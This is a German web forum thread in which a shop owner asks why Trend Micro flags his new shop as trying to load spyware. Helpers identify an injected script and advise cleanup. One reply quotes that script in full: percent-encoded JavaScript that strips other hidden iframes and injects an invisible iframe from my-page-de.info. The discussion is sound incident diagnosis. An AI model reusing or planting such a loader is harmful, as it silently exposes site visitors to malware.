trendmicro sicherheitswarnung my-page-de.info

[sky_shop]

Hallo,

wenn ein User mit dem aktuellen Trendmicro auf meinen neuen Shop
** url entfernt *** geht, erhält er die Warnungmeldung das hier
versucht wird Spyware auf seinen rechner zu laden. Und Sie empfehlen
die Webseite nicht zu öffnen. Wer hat das selbige Problem? Wer kann helfen?
Grafiken im Anhang

Besten Dank im Voraus.

gruß

Sascha

[xt:mzanier]

da hat wohl jemand deinen webspace gehackt, denn anscheinend wurde hier einie datei des shops modifiziert und das eingefügt:

Zitat:

<Script>
......"%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b% 5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69 %20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%6 5%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79% 54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29 %2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3 d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65% 6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69 %66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%6 5%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d% 3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79 %6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%2 7%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77% 69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68% 74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d% 27%63%34%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74 %4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%2 8%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d% 7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b %0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2 e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e% 61%6d%65%3d%63%34%20%73%72%63%3d%5c%27%68%74%74%70 %3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%6 6%6f%2f%69%6e%2e%63%67%69%3f%39&%27%2b%4d%61%74%68 %2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6 f%6d%28%29%2a%32%31%39%38%34%29%2b%27%32%30%61%64% 37%33%35%64%32%32%32%5c%27%20%77%69%64%74%68%3d%34 %38%20%68%65%69%67%68%74%3d%34%35%38%20%73%74%79%6 c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e% 65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b %7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b..... .
</Script>

was vermutlich ein iframe sein wird welches eine infizierte datei lädt.

[hubbabubba]

Recht hat er. Ist'n kleines Javascript welches ein unsichtbares iframe von der, in der Warnmeldung, angegebenen Adresse nachlädt.

Ich würd' kein Risiko eingehen was in deinem Shop noch so alles manipuliert ist. Passworte ändern, Hoster informieren. Manipulierte Shopdateien+Datenbank runterkopieren und sichern (man weiß ja nie ob mans noch braucht) und vollständig neu aufspielen.


mfg